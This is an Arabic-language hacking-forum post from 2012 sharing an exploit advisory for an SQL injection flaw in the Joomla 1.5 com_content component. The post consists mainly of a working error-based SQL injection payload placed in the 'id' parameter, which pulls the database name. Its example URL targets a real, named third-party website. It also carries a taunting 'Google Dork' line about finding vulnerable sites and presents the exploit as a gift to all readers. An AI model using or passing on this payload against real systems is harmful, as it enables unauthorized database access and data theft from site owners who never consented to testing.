الموضوع: Joomla Component (com_content) SQL Injection Vulnerability
عرض مشاركة واحدة
قديم 06-04-2012, 07:25 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
ViRuS_BaGhDaD
 
الصورة الرمزية ViRuS_BaGhDaD
 

 
 
إحصائية العضو






ViRuS_BaGhDaD غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ViRuS_BaGhDaD is on a distinguished road
.......... Joomla Component (com_content) SQL Injection Vulnerability

الـسـلام عـلـيـكـم شـبـاب

ثـغـره في سكربت جوملا حبيت اطرحها للجميع

كود:
 
################################################################
# Exploit Title:  Joomla   Component   (com_content)  SQL  Injection  Vulnerability
# Google Dork:Use yOur M!nd ^_^
# Date: 4/6/2012
# Home: http://www.sec-art.net
# Exploit Author: Cyb3r-R00T
# Version: Joomla! 1.5 - Open Source Content Management
# Tested on: Debian GNU/Linux,Windows 7 Ultimate
################################################################
[~]Exploit/p0c :
http://site.com/index.php?option=com_content&view=category&id=[SQL]
[~]Example :
http://www.greenmining.or.id/index.php?option=com_content&view=category&id=75 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--pt-newmont&Itemid=3
#E0F
#Greetz 2#~ Karar alShaMi; Faris; H311 C0D3; TiGER-M@TE; RiSKy and all Sec-Art.net Members
تـحـيـاتي

Security Art | Cyb3r-R00T



Joomla Component (com_content) SQL Injection Vulnerability

التعديل الأخير تم بواسطة ViRuS_BaGhDaD ; 06-04-2012 الساعة 07:28 PM.

   

رد مع اقتباس